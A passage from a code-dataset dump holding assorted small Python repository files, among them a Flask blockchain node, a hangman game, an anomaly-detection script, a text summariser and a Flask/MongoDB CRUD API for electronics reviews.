This is the actual mining. Tryig to solve a problem.\n proof = blockchain.proof_of_worf(previous_proof)\n\n # with a proof at hands now you are good to go on creating a new block\n previous_hash = blockchain.hash(previous_block)\n\n # Add a transaction to your wallet since you are going to mine the block!\n blockchain.add_transaction(\n sender=node_address,\n receiver=miner,\n amount=1\n )\n\n block = blockchain.create_block(proof, previous_hash)\n response = {\n 'message': 'Congratulations on mining a new block!',\n 'index': block['index'],\n 'timestamp': block['timestamp'],\n 'proof': block['proof'],\n 'previous_hash': block['previous_hash'],\n 'transactions': block['transactions']\n }\n\n return jsonify(response), 200\n\n\n@app.route('/is_chain_valid')\ndef is_chain_valid():\n return jsonify(blockchain.is_chain_valid(blockchain.chain)), 200\n\n\n@app.route('/add_transaction', methods=['POST'])\ndef add_transaction():\n json = request.get_json()\n transaction_keys = ['sender', 'receiver', 'amount']\n if not all(key in json for key in transaction_keys):\n return 'Misising information elements', 400\n index = blockchain.add_transaction(\n json['sender'],\n json['receiver'],\n json['amount']\n )\n response = {'message': f'This transaction will be added to block {index}'}\n return jsonify(response), 201\n\n\n@app.route('/connect_node', methods=['POST'])\ndef connect_node():\n json = request.get_json()\n nodes = json.get('nodes')\n if nodes is None:\n return 'Empty', 400\n for node in nodes:\n blockchain.add_node(node)\n response = {\n \"message\": \"All following nodes connected:\",\n \"total_node\": list(blockchain.nodes)\n }\n return jsonify(response), 201\n\n\n@app.route('/replace_chain', methods=['GET'])\ndef replace_chain():\n is_chain_replaced = blockchain.replace_chain()\n if is_chain_replaced:\n response = {\n \"message\": \"The chain was replaced\",\n \"new_chain\": blockchain.chain\n }\n else:\n response = {\n \"message\": \"The chain was not replaced\",\n \"chain\": blockchain.chain\n }\n return jsonify(response), 200\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello, as!'\n","repo_name":"ricardomlima/blockchain-development","sub_path":"workplace/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70023417495","text":"\"\"\"Utility classes.\"\"\"\n\nimport ROOT as R\nimport numpy as np\n\n\nclass Color(int):\n \"\"\"Create a new R.TColor object with an associated index.\n https://root-forum.cern.ch/t/how-to-form-a-color-t-from-a-tcolor/25013/2.\n \"\"\"\n\n def __new__(cls, r, g, b, name=\"\"):\n self = int.__new__(cls, R.TColor.GetFreeColorIndex())\n self.object = R.TColor(self, r, g, b, name, 1.0)\n self.name = name\n return self\n\n\nclass ColorFinder:\n \"\"\"Handles color matching with ROOT ones starting from an arbitrary pixel.\"\"\"\n\n def __init__(self, r, g, b):\n self.my_color = np.array((r, g, b))\n self._c = R.TColor()\n\n def match(self):\n \"\"\"Find closest color within ROOT color wheel.\"\"\"\n self._init_wheel()\n\n tmp_dist = 0.0\n match_color = None\n\n for root_color in self._wheel:\n dist = np.linalg.norm(root_color - self.my_color)\n\n if tmp_dist > dist or not type(match_color).__module__ == np.__name__:\n match_color = root_color\n tmp_dist = dist\n\n return self._c.GetColor(match_color[0], match_color[1], match_color[2])\n\n def _init_wheel(self):\n \"\"\"Initialise ROOT color wheel.\"\"\"\n\n self._wheel = []\n\n colors = {\n (-10, 15): [R.kRed, R.kBlue, R.kGreen, R.kMagenta, R.kCyan, R.kYellow],\n (-9, 20): [R.kPink, R.kAzure, R.kSpring, R.kOrange, R.kViolet, R.kTeal],\n (0, 1): [R.kBlack, R.kWhite],\n (0, 4): [R.kGray],\n }\n\n for (shift, window), color_list in colors.items():\n for c in color_list:\n\n self._wheel.extend(\n [\n np.array(\n (\n R.gROOT.GetColor(c + i + shift).GetRed(),\n R.gROOT.GetColor(c + i + shift).GetGreen(),\n R.gROOT.GetColor(c + i + shift).GetBlue(),\n )\n )\n for i in range(window)\n ]\n )\n\n\n# EOF\n","repo_name":"fscutti/pyrate","sub_path":"pyrate/utils/ROOT_classes.py","file_name":"ROOT_classes.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71458558613","text":"import sqlite3\nimport sys\nimport random\nfrom random import randrange\nfrom datetime import datetime, timedelta, date, time\n\ndb = sys.argv[1]\nconn = sqlite3.connect(db)\ncursor = conn.cursor()\ncursor.execute('PRAGMA foreign_keys=ON;') \nconn.commit()\n\ndef main():\n\n\t\n\tprice_range()\n\t#tenants()\n\ndef price_range():\n\tleft_range_input = input(\"What is the minimum price?: \")\n\tright_range_input = input(\"What is the maximum price?: \")\n\tsuit_input = input(\"What is the suit type?: \")\n\n\tcursor.execute(\"SELECT sID, price FROM Suits WHERE ? LIKE type AND price >= ? AND price <= ? ORDER BY price ASC\", (suit_input, left_range_input, right_range_input))\n\tsuites = cursor.fetchall()\n\tconn.commit()\n\n\tfor row in suites:\n\t\tprint(row)\n\ndef tenants():\n\tid_input = input(\"What is the suit ID?: \")\n\n\n\t\n\t#cursor.execute(create_query)\n\t#conn.commit()\n\n\tcursor.execute(\"SELECT * FROM Tenants WHERE sID = ? AND yearOfOccup < 2000;\", (id_input,))\n\n\tcol1 = cursor.description[0][0]\n\tcol2 = cursor.description[1][0]\n\tcol3 = cursor.description[2][0]\n\tcol4 = cursor.description[3][0]\n\n\tcreate_query = '''CREATE TABLE selected_tenants (\n %s INTEGER,\n %s TEXT,\n %s INTEGER,\n %s INTEGER,\n PRIMARY KEY (tID),\n FOREIGN KEY (sID) REFERENCES Suits\n);''' % (col1,col2,col3,col4)\n\n\t\n\n\tdata = cursor.fetchall()\n\t#print(data)\n\tconn.commit()\n\n\tcursor.execute(\"drop table if exists selected_tenants;\")\n\tconn.commit()\n\tcursor.execute(create_query)\n\tconn.commit()\n\n\t#cursor.execute(\"SELECT * FROM selected_tenants\")\n\t#print(\"name of the first column: \" + cursor.description[0][0])\n\t#conn.commit()\n\n\tfor row in data:\n\t\ti_tID = row[0]\n\t\ti_name = row[1]\n\t\ti_year = row[2]\n\t\ti_sID = row[3]\n\t\ttenant_data = (i_tID, i_name, i_year, i_sID)\n\t\tprint(tenant_data)\n\t\tcursor.execute(\"INSERT INTO selected_tenants(tID, name, yearOfOccup, sID) VALUES (?,?,?,?)\", tenant_data)\n\t\tconn.commit()\n\n\n\n\n\n\n\n\n\n\n\n\nmain()\nconn.close()","repo_name":"gnassar97/sqlite-mock-administrative-database","sub_path":"tenants.py","file_name":"tenants.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"6505747858","text":"# -*- coding: utf-8 -*-\n# http://www.django-rest-framework.org/topics/3.7-announcement/#customizing-api-docs-schema-generation\ntry:\n from rest_framework.schemas import AutoSchema\nexcept ImportError:\n EsAutoSchema = type(\"EsAutoSchema\", tuple(), dict())\nelse:\n from rest_framework.schemas.utils import is_list_view\n\n class EsAutoSchema(AutoSchema):\n \"\"\"Elasticsearch inspector for APIView.\n Responsible for per-view instrospection and schema generation.\n \"\"\"\n def get_es_filter_fields(self, path, method):\n fields = []\n for filter_backend in self.view.es_filter_backends:\n fields += filter_backend().get_schema_fields(self.view)\n return fields\n\n def get_filter_fields(self, path, method):\n fields = super(EsAutoSchema, self).get_filter_fields(path, method)\n fields += self.get_es_filter_fields(path, method)\n return fields\n\n def get_es_pagination_fields(self, path, method):\n view = self.view\n if not is_list_view(path, method, view):\n return []\n\n pagination = getattr(view, 'es_pagination_class', None)\n if not pagination:\n return []\n\n return pagination().get_schema_fields(view)\n\n def get_pagination_fields(self, path, method):\n fields = super(EsAutoSchema, self).get_pagination_fields(path, method)\n fields += self.get_es_pagination_fields(path, method)\n return fields\n","repo_name":"myarik/django-rest-elasticsearch","sub_path":"rest_framework_elasticsearch/es_inspector.py","file_name":"es_inspector.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"67"} +{"seq_id":"17785853909","text":"# Hangman game\n\nimport random\n\nWORDLIST_FILENAME = \"C:\\Sanket Jain\\Coding\\Python Code\\words.txt\"\n\ndef loadWords():\n \"\"\"\n Returns a list of valid words. Words are strings of lowercase letters.\n \n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r')\n # line: string\n line = inFile.readline()\n # wordlist: list of strings\n wordlist = line.split()\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\ndef chooseWord(wordlist):\n \"\"\"\n wordlist (list): list of words (strings)\n\n Returns a word from wordlist at random\n \"\"\"\n return random.choice(wordlist)\n\n\n\nwordlist = loadWords()\n\ndef isWordGuessed(secretWord, lettersGuessed):\n '''\n secretWord: string, the word the user is guessing\n lettersGuessed: list, what letters have been guessed so far\n returns: boolean, True if all the letters of secretWord are in lettersGuessed;\n False otherwise\n '''\n x = set(secretWord)\n y = [True if i in lettersGuessed else False for i in x]\n return all(y)\n\n\n\ndef getGuessedWord(secretWord, lettersGuessed):\n '''\n secretWord: string, the word the user is guessing\n lettersGuessed: list, what letters have been guessed so far\n returns: string, comprised of letters and underscores that represents\n what letters in secretWord have been guessed so far.\n '''\n return \"\".join(map(str,[\"_ \" if x not in lettersGuessed else x for x in secretWord]))\n\n\n\ndef getAvailableLetters(lettersGuessed):\n '''\n lettersGuessed: list, what letters have been guessed so far\n returns: string, comprised of letters that represents what letters have not\n yet been guessed.\n '''\n return \"\".join(map(str,[\"\" if x in lettersGuessed else x for x in \"abcdefghijklmnopqrstuvwxyz\"]))\n \n\ndef hangman(secretWord):\n '''\n secretWord: string, the secret word to guess.\n\n Starts up an interactive game of Hangman.\n\n * At the start of the game, lets the user know how many \n letters the secretWord contains.\n\n * Asks the user to supply one guess (i.e. letter) per round.\n\n * The user receives feedback immediately after each guess \n about whether their guess appears in the computers word.\n\n * After each round, the user is displayed the \n partially guessed word so far, as well as letters that the \n user has not yet guessed.\n '''\n loadWords()\n print(\"Welcome to the game Hangman!\")\n length_of_chosen_word = len(secretWord)\n print(\"I am thinking of a word that is \"+str(length_of_chosen_word)+\" letters long.\")\n print(\"-------------\")\n x = 8\n lettersGuessed = []\n while x > 0:\n print(\"You have \"+str(x)+\" guesses left.\")\n print(\"Available letters: \"+getAvailableLetters(lettersGuessed))\n guess = input(\"Please guess a letter: \")\n guessInLowerCase = guess.lower()\n if guessInLowerCase in getAvailableLetters(lettersGuessed):\n lettersGuessed.append(guessInLowerCase)\n if isWordGuessed(secretWord, lettersGuessed):\n print(\"Good guess: \"+secretWord)\n print(\"-------------\")\n print(\"Congratulations, you won!\")\n break\n elif guessInLowerCase in set(secretWord):\n print(\"Good guess: \"+getGuessedWord(secretWord, lettersGuessed))\n print(\"-------------\")\n x += 0\n else:\n print(\"Oops! That letter is not in my word: \"+getGuessedWord(secretWord, lettersGuessed))\n print(\"-------------\")\n x-=1\n else:\n print(\"Oops! You've already guessed that letter: \"+getGuessedWord(secretWord, lettersGuessed))\n print(\"-------------\")\n x += 0\n else:\n print(\"Sorry, you ran out of guesses. The word was \"+secretWord+\".\")\n\n\nsecretWord = chooseWord(wordlist).lower()\nhangman(secretWord)\n","repo_name":"Sanket1704/Hangman-Game","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74032963732","text":"import os\nimport sys\n\nimport setuptools\nfrom setuptools import setup, find_packages\n\nwith open('README.md', 'r') as fh:\n long_description = fh.read()\n\nclassifiers = [\n #'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3.7',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Scientific/Engineering :: Mathematics',\n 'Topic :: Scientific/Engineering :: Physics']\n\nsetuptools.setup(\n name='pyladder',\n version='0.0.8',\n packages=setuptools.find_packages(),\n include_package_data=False,\n author='Harald Ujc',\n author_email='harald.ujc@screenpopsoftware.com',\n maintainer='Harald ujc',\n maintainer_email='harald.ujc@screenpopsoftware.com',\n description='A python package for planarity testing and rendering of ladder type graphs',\n classifiers=classifiers,\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/haraldujc/pyladder',\n python_requires='>=3.6',\n license='BSD License'\n)","repo_name":"haraldujc/pyladder","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"36435215026","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\ndef bonAppetit(bill, k, b):\n # Write your code here\n razn = sum(bill) - bill[k]\n del2 = razn//2\n if b != del2:\n print (b - del2)\n else:\n print('Bon Appetit')\n\nif __name__ == '__main__':\n first_multiple_input = input().rstrip().split()\n\n n = int(first_multiple_input[0])\n\n k = int(first_multiple_input[1])\n\n bill = list(map(int, input().rstrip().split()))\n\n b = int(input().strip())\n\n bonAppetit(bill, k, b)\n","repo_name":"H1bro/Hackerrank-Problem-Solving-Solutions","sub_path":"HackerRank-Bill Division/Bill_Division.py","file_name":"Bill_Division.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19347334488","text":"from jinja2 import contextfunction\nfrom jinja2.ext import Extension\n\nclass openttd(Extension):\n def __init__(self, environment):\n super(openttd, self).__init__(environment)\n environment.globals[\"openttd_auto\"] = self.__auto\n\n @contextfunction\n def __auto(self, context, key):\n \"\"\"\n Shorthand for creating a ``key = value`` entry in an openttd config.\n \"\"\"\n\n config_key = context[\"openttd\"][\"config\"]\n config = context[\"openttd\"][\"config_def\"][config_key]\n value = config[key]\n\n if isinstance(value, bool):\n value = \"true\" if value else \"false\"\n return \"%s = %s\" % (key, value)\n","repo_name":"bgw/ansible-playbooks","sub_path":"plugins/jinja2_plugins/openttd.py","file_name":"openttd.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"67"} +{"seq_id":"9129154149","text":"# -*- coding:utf-8 -*-\n\nimport pyculiarity.detect_ts as detect_ts_func\nimport pandas as pd\n\nn_file = 'machine_temperature_system_failure'\ntimeS_DF = pd.read_csv('./data/%s.csv'% n_file, usecols = ['timestamp', 'value'])\n# print(timeS_DF)\n\n\"\"\" detect_ts grouped by only_last / longterm / resample_period \"\"\"\n# PARAM > max_anoms : S-H-ESD에서 감지 할 수 있는 최대 수치(%, 0.5 이하), direction: 방향(pos, neg, both), only_last : 관심 기간(day, hr, None), resample_period : resampling period\n# PARAM > threshold: Only report positive going anoms above the threshold specified. Options are: (None | 'med_max' | 'p95' | 'p99')\n# machine_temperature_system_failure\nresults = detect_ts_func(timeS_DF, max_anoms=0.01, direction='both', only_last= None, resample_period='H')\n#print(results)\n\n\"\"\" Plotting \"\"\"\n# reformat the index and columns\ntimeS_DF = timeS_DF.set_index('timestamp')\n\nanomsDF = results['anoms']\nanomsDF.drop(['timestamp'], axis = 1, inplace = True)\nanomsDF['is_anom'] = True\n# anomsDF.columns = ['anom_value','is_anom']\n\nmerged_DF = pd.merge(left = timeS_DF, right= anomsDF, left_index=True, right_index=True, how = 'left')\n# merged_DF.drop('anom_value',axis = 1,inplace=True)\n\n\"\"\" Deliverables \"\"\"\nprint ('>>> the number of anomaly: ', len(results['anoms']))\nprint (results['anoms'].head())\n\n\n\n","repo_name":"17billion/s_h_esd","sub_path":"S_H_ESD_anom.py","file_name":"S_H_ESD_anom.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27420005809","text":"\"\"\"Module for generating and collecting embedded resource results.\"\"\"\n\nfrom __future__ import absolute_import\n\nimport os\n\nfrom buildscripts.mobile import adb_monitor\nfrom buildscripts.resmokelib import config as _config\nfrom buildscripts.resmokelib.testing.hooks import interface\n\n\nclass CollectEmbeddedResources(interface.Hook): # pylint: disable=too-many-instance-attributes\n \"\"\"CollectEmbeddedResources class.\n\n CollectEmbeddedResources starts and stops the resource monitoring for each test.\n \"\"\"\n\n DESCRIPTION = \"Embedded resources\"\n\n def __init__(self, hook_logger, fixture, sample_interval_ms=500, threads=1):\n \"\"\"Initialize CollectEmbeddedResources.\"\"\"\n interface.Hook.__init__(self, hook_logger, fixture, CollectEmbeddedResources.DESCRIPTION)\n self.hook_logger = hook_logger\n self.adb = None\n self.adb_control = None\n if _config.BENCHRUN_DEVICE == \"Android\":\n self.report_root = _config.BENCHRUN_REPORT_ROOT\n self.sample_interval_ms = sample_interval_ms\n self.threads = threads\n self.battery_file = \"battery.csv\"\n self.cpu_file = \"cpu.json\"\n self.memory_file = \"memory.csv\"\n self.adb = adb_monitor.Adb(logger=hook_logger)\n\n def before_test(self, test, test_report):\n \"\"\"Start ADB monitoring.\"\"\"\n if self.adb:\n battery_file = self._report_path(test, \"battery.csv\")\n cpu_file = self._report_path(test, \"cpu.json\")\n memory_file = self._report_path(test, \"memory.csv\")\n self.adb_control = adb_monitor.AdbControl(\n self.adb, logger=self.hook_logger, battery_file=battery_file, cpu_file=cpu_file,\n memory_file=memory_file, sample_interval_ms=self.sample_interval_ms)\n self.hook_logger.info(\"Starting ADB monitoring for test %s\", test.short_name())\n self.hook_logger.info(\"ADB resource files: %s %s %s\", battery_file, cpu_file,\n memory_file)\n self.adb_control.start()\n\n def after_test(self, test, test_report):\n \"\"\"Stop ADB monitoring.\"\"\"\n if self.adb_control:\n self.hook_logger.info(\"Stopping ADB monitoring for test %s\", test.short_name())\n self.adb_control.stop()\n\n def _report_path(self, test, report_name):\n \"\"\"Return the report path. Reports are stored in //thread/.\"\"\"\n return os.path.join(self.report_root, test.short_name(), \"thread{}\".format(self.threads),\n report_name)\n","repo_name":"hwCloudDBSDDS/dds","sub_path":"buildscripts/resmokelib/testing/hooks/collect_embedded_resources.py","file_name":"collect_embedded_resources.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"72"} +{"seq_id":"16617226741","text":"from db.run_sql import run_sql\nfrom models.fixture import Fixture\nfrom models.player import Player\nimport repositories.player_repository as player_repository\nfrom models.team import Team\nimport repositories.team_repository as team_repository\n\n# add new fixture to database\ndef save(fixture):\n sql = \"INSERT INTO fixtures (team1_id, team2_id) VALUES (%s, %s) RETURNING id\"\n values = [fixture.team1, fixture.team2]\n results = run_sql(sql, values)\n id = results[0]['id']\n fixture.id = id\n return fixture\n\n# get all fixtures from database\ndef select_all():\n fixtures = []\n sql = \"SELECT * FROM fixtures\"\n results = run_sql(sql)\n for result in results:\n team1 = team_repository.select(result[\"team1_id\"])\n team2 = team_repository.select(result[\"team2_id\"])\n fixture = Fixture(team1, team2, result[\"id\"])\n fixtures.append(fixture)\n return fixtures\n\n# get specific fixture from database\ndef select(id):\n sql = \"SELECT * FROM fixtures WHERE id = %s\"\n values = [id]\n result = run_sql(sql, values)[0]\n fixture = Fixture(result[\"team1_id\"], result[\"team2_id\"], result[\"id\"])\n return fixture\n\n# update specific fixture in database\ndef update(fixture):\n sql = \"UPDATE fixtures SET (team1_id, team2_id) = (%s, %s) WHERE id = %s\"\n values = [fixture.team1, fixture.team2, fixture.id]\n run_sql(sql, values)\n\n# delete all\ndef delete_all():\n sql = \"DELETE FROM fixtures\"\n run_sql(sql)\n\n#delete specific entry\ndef delete(id):\n sql = \"DELETE FROM fixtures WHERE id = %s\"\n values = [id]\n run_sql(sql, values)\n","repo_name":"RichardsonMark/project-sports-scoring","sub_path":"repositories/fixture_repository.py","file_name":"fixture_repository.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44258531560","text":"import nltk\nfrom nltk.corpus import stopwords\nfrom string import punctuation\nfrom operator import itemgetter\n\nfi = open(\"input.txt\", \"r\")\ntext = fi.read()\nprint(\" The original paragraph is : \\n\")\nprint(text)\nprint()\nnewtext = text.lower()\ntext = nltk.sent_tokenize(text)\n\n#getting the list of stopwords\nstopWords = stopwords.words('english')\npt = list(punctuation)\nfor i in pt:\n\tstopWords.append(i)\n\nsent = nltk.sent_tokenize(newtext)\n\ntokens = []\ntitle = sent[0]\ntitletokens = nltk.word_tokenize(title)\nsent = sent[1:]\n\n\nfor i in range(len(sent)):\n\twords = nltk.word_tokenize(sent[i])\n\tfiltered = []\n\tfor w in words:\n\t\tif w not in stopWords:\n\t\t\tfiltered.append(w)\n\ttokens.append(filtered)\n\n#print(\" Tokens in the input are : \")\n#print(tokens)\n\n#scores for all sentences except title\nscores = []\nfor i in range(len(sent)):\n\tscores.append([])\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 1) Sentence Location\n\nscores[0].append(1.0)\nscores[1].append(0.8)\nscores[2].append(0.6)\nscores[3].append(0.4)\nscores[4].append(0.2)\n\nfor i in range(5, len(sent)):\n\tscores[i].append(0)\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 2) Sentence Length\n\nmaxlength = max(len(s) for s in sent)\nfor i in range(len(sent)):\n\tscores[i].append(len(sent[i])/maxlength)\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 3) Term Frequency\n\nfrequencies = []\nmaxf = []\nfor i in range(len(sent)):\n\tf = []\n\tfor w in tokens[i]:\n\t\tfreq = 0\n\t\tfor j in range(len(sent)):\n\t\t\tfreq += tokens[j].count(w)\n\t\tf.append(freq)\n\tfrequencies.append(f)\n\tmaxf.append(max(f))\n\nmaxfreq = max(maxf)\n\nfor i in range(len(sent)):\n\ttf = []\n\tj = 0\n\tfor w in tokens[i]:\n\t\ttf.append(frequencies[i][j]/maxfreq)\n\tscores[i].append(sum(tf)/len(tf))\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 4) TF-IDF\n# For our examples, TF-IDF is same as TF because we use only one document in corpus\n\nfor i in range(len(sent)):\n\ttf = []\n\tj = 0\n\tfor w in tokens[i]:\n\t\ttf.append(frequencies[i][j]/maxfreq)\n\tscores[i].append(sum(tf)/len(tf))\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 5) Sentence resemblence to Title\n\nfor i in range(len(sent)):\n\tcount = 0\n\tfor w in titletokens:\n\t\tif w in tokens[i]:\n\t\t\tcount += 1\n\tscores[i].append(count/(len(sent[i])+len(titletokens)))\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 6) Sentence centrality\n\nfor i in range(len(sent)):\n\tcount = 0\n\tfor w in tokens[i]:\n\t\tc = 0\n\t\tfor j in range(len(sent)):\n\t\t\tif i!=j :\n\t\t\t\tif w in tokens[j]:\n\t\t\t\t\tc += 1\n\t\tif c!=0:\n\t\t\tcount += 1\n\tscores[i].append(count/len(tokens))\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 7) Sentence inclusion of emphasis words\n\nemphasis = [\"very\" , \"amazingly\" , \"remarkably\" , \"especially\", \"certainly\", \"crucially\", \"truly\", \"really\", \"exceptionally\", \"particularly\", \"specifically\", \"seriously\", \"importantly\", \"surely\", \"extremely\", \"incredibly\", \"absolutely\", \"quite\", \"highly\", \"indeed\"]\n\nfor i in range(len(sent)):\n\tcount = 0\n\tfor w in tokens[i]:\n\t\tif w in emphasis:\n\t\t\tcount += 1\n\tscores[i].append(count/len(sent[i]))\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 8) Sentence inclusion of name entities\n\nfor i in range(len(sent)):\n\tcount = 0\n\ttags = nltk.pos_tag(tokens[i])\n\tfor a,b in tags :\n\t\tif b == \"NNP\":\n\t\t\tcount += 1\n\tscores[i].append(count/len(sent[i]))\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 9) Sentence inclusion of numeric data\n\nfor i in range(len(sent)):\n\tcount = 0\n\tfor w in tokens[i]:\n\t\tif w.isdigit() == True:\n\t\t\tcount += 1\n\tscores[i].append(count/len(sent[i]))\n\n#--------------------------------------------------------------------------------------------------------------------------------------\nwt = [14,3,1,5,4,13,12,11,2]\ntotal = []\n\nfor i in range(len(sent)):\n\ts = 0\n\tfor j in range(len(wt)):\n\t\ts += wt[j]*scores[i][j]\n\ttotal.append(s)\n\n#print(scores)\n#print(total)\n\nn = int(input(\" How many lines of summary : \"))\nlarge = max(total)\n\nfinal = []\nfor i in range(len(total)):\n\tfinal.append([])\n\tfinal[i].append(total[i])\n\tfinal[i].append(i)\n\n#print(final)\nfinal.sort()\nfinal.reverse()\nfinal = final[0:n]\n#print(final)\nfinal.sort(key=itemgetter(1))\n#print(final)\n\nfor i in range(n):\n\tprint(text[final[i][1]+1], end='')\n\nprint()\n","repo_name":"divyamadhav/Automatic-Text-Summarization","sub_path":"summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33893533850","text":"from asyncio.windows_events import NULL\nfrom flask import Flask, request\nfrom flask.json import jsonify\nfrom flask_cors import CORS, cross_origin\nfrom flask_pymongo import PyMongo, ObjectId\n\nname_reviewer = \"Nancy C. Johnson\"\n\n# Se crea la conexion con la Base de Datos\napp = Flask(__name__)\n# URI a la BD real con todos los elementos del dataset\n# Nota: Los metodos Create y PUT no funcionan debido a que se excedio el limite de datos permitido, DELETE y GET funcionan correctamente.\napp.config['MONGO_URI'] = ''\n\n## app.config['MONGO_URI'] = 'mongodb://localhost/Electronics'\n# URI a la BD de prueba, en esta solo existen 20 elementos del dataset original\n# Nota: Todos los metodos funcionan como deberian\n\n\napp.config['CORS_HEADERS'] = 'Content-Type'\nCORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\nmongo = PyMongo(app)\ndb = mongo.db.electronicos\n\n\n\n# CRUD: Añadir un nuevo elemento\n@app.route('/electronics', methods=['POST'])\ndef createElectronic():\n id = db.insert_one({\n 'reviewerID': request.get_json(force=True)['reviewerID'],\n 'asin': request.get_json(force=True)['asin'],\n 'reviewerName': request.get_json(force=True)['reviewerName'],\n 'helpful': request.get_json(force=True)['helpful'],\n 'reviewText': request.get_json(force=True)['reviewText'],\n 'overall': request.get_json(force=True)['overall'],\n 'summary': request.get_json(force=True)['summary'],\n 'unixReviewTime': request.get_json(force=True)['unixReviewTime'],\n 'reviewTime': request.get_json(force=True)['reviewTime'],\n 'category': request.get_json(force=True)['category'],\n 'class': request.get_json(force=True)['class']\n })\n return jsonify({'msg': 'Electronic created'})\n\n# CRUD: Pedir todos los elementos\n# @app.route('/electronics//', methods=['GET'])\n# def getElectronics(initialPage, endPage):\n# electronics = []\n# for index in range(int(initialPage), int(endPage)):\n# electronic = db.find()[index]\n# if(not 'reviewerName' in electronic):\n# electronic['reviewerName'] = \"NULL\"\n\n# electronics.append({\n# '_id': str(ObjectId(electronic['_id'])),\n# 'reviewerID': electronic['reviewerID'],\n# 'asin': electronic['asin'],\n# 'reviewerName': electronic['reviewerName'],\n# 'helpful': electronic['helpful'],\n# 'reviewText': electronic['reviewText'],\n# 'overall': electronic['overall'],\n# 'summary': electronic['summary'],\n# 'unixReviewTime': electronic['unixReviewTime'],\n# 'reviewTime': electronic['reviewTime'],\n# 'category': electronic['category'],\n# 'class': electronic['class'],\n# })\n# return jsonify(electronics)\n\n@app.route('/electronics', methods=['GET'])\ndef getElectronics():\n electronics = []\n for electronic in db.find().limit(3000):\n if(not 'reviewerName' in electronic):\n electronic['reviewerName'] = \"NULL\"\n electronics.append({\n '_id': str(ObjectId(electronic['_id'])),\n 'reviewerID': electronic['reviewerID'],\n 'asin': electronic['asin'],\n 'reviewerName': electronic['reviewerName'],\n 'helpful': electronic['helpful'],\n 'reviewText': electronic['reviewText'],\n 'overall': electronic['overall'],\n 'summary': electronic['summary'],\n 'unixReviewTime': electronic['unixReviewTime'],\n 'reviewTime': electronic['reviewTime'],\n 'category': electronic['category'],\n 'class': electronic['class'],\n })\n return jsonify(electronics)\n\n\n# CRUD: Pedir un unico elemento\n@app.route('/electronic/', methods=['GET'])\ndef getElectronic(id):\n electronic = db.find_one({'_id': ObjectId(id)})\n print(electronic)\n return jsonify({\n '_id': str(ObjectId(electronic['_id'])),\n 'reviewerID': electronic['reviewerID'],\n 'asin': electronic['asin'],\n 'reviewerName': electronic['reviewerName'],\n 'helpful': electronic['helpful'],\n 'reviewText': electronic['reviewText'],\n 'overall': electronic['overall'],\n 'summary': electronic['summary'],\n 'unixReviewTime': electronic['unixReviewTime'],\n 'reviewTime': electronic['reviewTime'],\n 'category': electronic['category'],\n 'class': electronic['class']\n })\n\n# CRUD: Eliminar un unico elemento\n@app.route('/electronics/', methods=['DELETE'])\ndef deleteElectronic(id):\n db.delete_one({'_id': ObjectId(id)})\n return jsonify({'msg': 'Electronic Deleted'})\n\n# CRUD: Actualizar un unico elemento\n@app.route('/electronics/', methods=['PUT'])\ndef updateElectronic(id):\n db.update_one({'_id': ObjectId(id)}, {'$set': {\n 'reviewerID': request.get_json(force=True)['reviewerID'],\n 'asin': request.get_json(force=True)['asin'],\n 'reviewerName': request.get_json(force=True)['reviewerName'],\n 'helpful': request.get_json(force=True)['helpful'],\n 'reviewText': request.get_json(force=True)['reviewText'],\n 'overall': request.get_json(force=True)['overall'],\n 'summary': request.get_json(force=True)['summary'],\n 'unixReviewTime': request.get_json(force=True)['unixReviewTime'],\n 'reviewTime': request.get_json(force=True)['reviewTime'],\n 'category': request.get_json(force=True)['category'],\n 'class': request.get_json(force=True)['class']\n }})\n return 